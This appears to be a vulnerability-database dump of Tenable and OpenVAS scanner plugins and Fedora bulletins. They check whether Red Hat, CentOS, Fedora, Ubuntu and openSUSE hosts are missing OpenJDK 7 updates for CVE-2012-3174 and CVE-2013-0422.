script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0165\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "The OpenJDK runtime environment. ", "modified": "2013-01-16T19:35:17", "published": "2013-01-16T19:35:17", "id": "FEDORA:4A3812148A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: java-1.7.0-openjdk-1.7.0.9-2.3.4.fc18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2012-4681", "CVE-2013-0422"], "description": "The OpenJDK runtime environment. ", "modified": "2013-01-16T19:42:39", "published": "2013-01-16T19:42:39", "id": "FEDORA:B66CF208CD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: java-1.7.0-openjdk-1.7.0.9-2.3.4.fc17", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-3521", "CVE-2011-3544", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3551", "CVE-2011-3552", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3558", "CVE-2011-3560", "CVE-2011-3563", "CVE-2011-3571", "CVE-2011-5035", "CVE-2012-0497", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-3174", "CVE-2012-4681", "CVE-2013-0422"], "description": "The OpenJDK runtime environment. ", "modified": "2013-01-16T19:49:12", "published": "2013-01-16T19:49:12", "id": "FEDORA:D68E221277", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-12-04T11:22:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Check for the Version of openjdk-7", "modified": "2017-12-01T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:841283", "href": "http://plugins.openvas.org/nasl.php?oid=841283", "type": "openvas", "title": "Ubuntu Update for openjdk-7 USN-1693-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1693_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for openjdk-7 USN-1693-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"openjdk-7 on Ubuntu 12.10\";\ntag_insight = \"It was discovered that OpenJDK 7's security mechanism could be bypassed via\n Java applets. If a user were tricked into opening a malicious website, a\n remote attacker could exploit this to perform arbitrary code execution as\n the user invoking the program.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1693-1/\");\n script_id(841283);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:50:59 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1693-1\");\n script_name(\"Ubuntu Update for openjdk-7 USN-1693-1\");\n\n script_summary(\"Check for the Version of openjdk-7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-cacao\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-jamvm\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-headless\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-lib\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-zero\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Check for the Version of java-1.7.0-openjdk", "modified": "2018-01-26T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:865170", "href": "http://plugins.openvas.org/nasl.php?oid=865170", "type": "openvas", "title": "Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"java-1.7.0-openjdk on Fedora 18\";\ntag_insight = \"The OpenJDK runtime environment.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096967.html\");\n script_id(865170);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:33:40 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2013-0422\", \"CVE-2012-3174\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-0853\");\n script_name(\"Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.7.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:1361412562310881557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881557", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-January/019203.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881557\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:37:56 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:1361412562310865170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865170", "type": "openvas", "title": "Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096967.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865170\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:33:40 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2013-0422\", \"CVE-2012-3174\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-0853\");\n script_name(\"Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-18T11:09:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Check for the Version of java-1_7_0-openjdk", "modified": "2018-01-17T00:00:00", "published": "2013-03-11T00:00:00", "id": "OPENVAS:850427", "href": "http://plugins.openvas.org/nasl.php?oid=850427", "type": "openvas", "title": "SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0199_1.nasl 8448 2018-01-17 16:18:06Z teissa $\n#\n# SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs\n and also severe security issues:\n\n * Security fixes\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n - S8006125: Update MethodHandles library interactions\n\n * Bug fixes\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle &gt; 32 bit shifts\n - G422525: Fix building with PaX enabled kernels.\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n - use icedtea package name instead of protected openjdk for\n jamvm builds\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n * bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n * add openjdk-7-src-b147-awt-crasher.patch\n - turn pulseaudio off on pre 11.4 distros\";\n\n\ntag_affected = \"java-1_7_0-openjdk on openSUSE 12.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00025.html\");\n script_id(850427);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:19 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2013:0199_1\");\n script_name(\"SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1_7_0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks 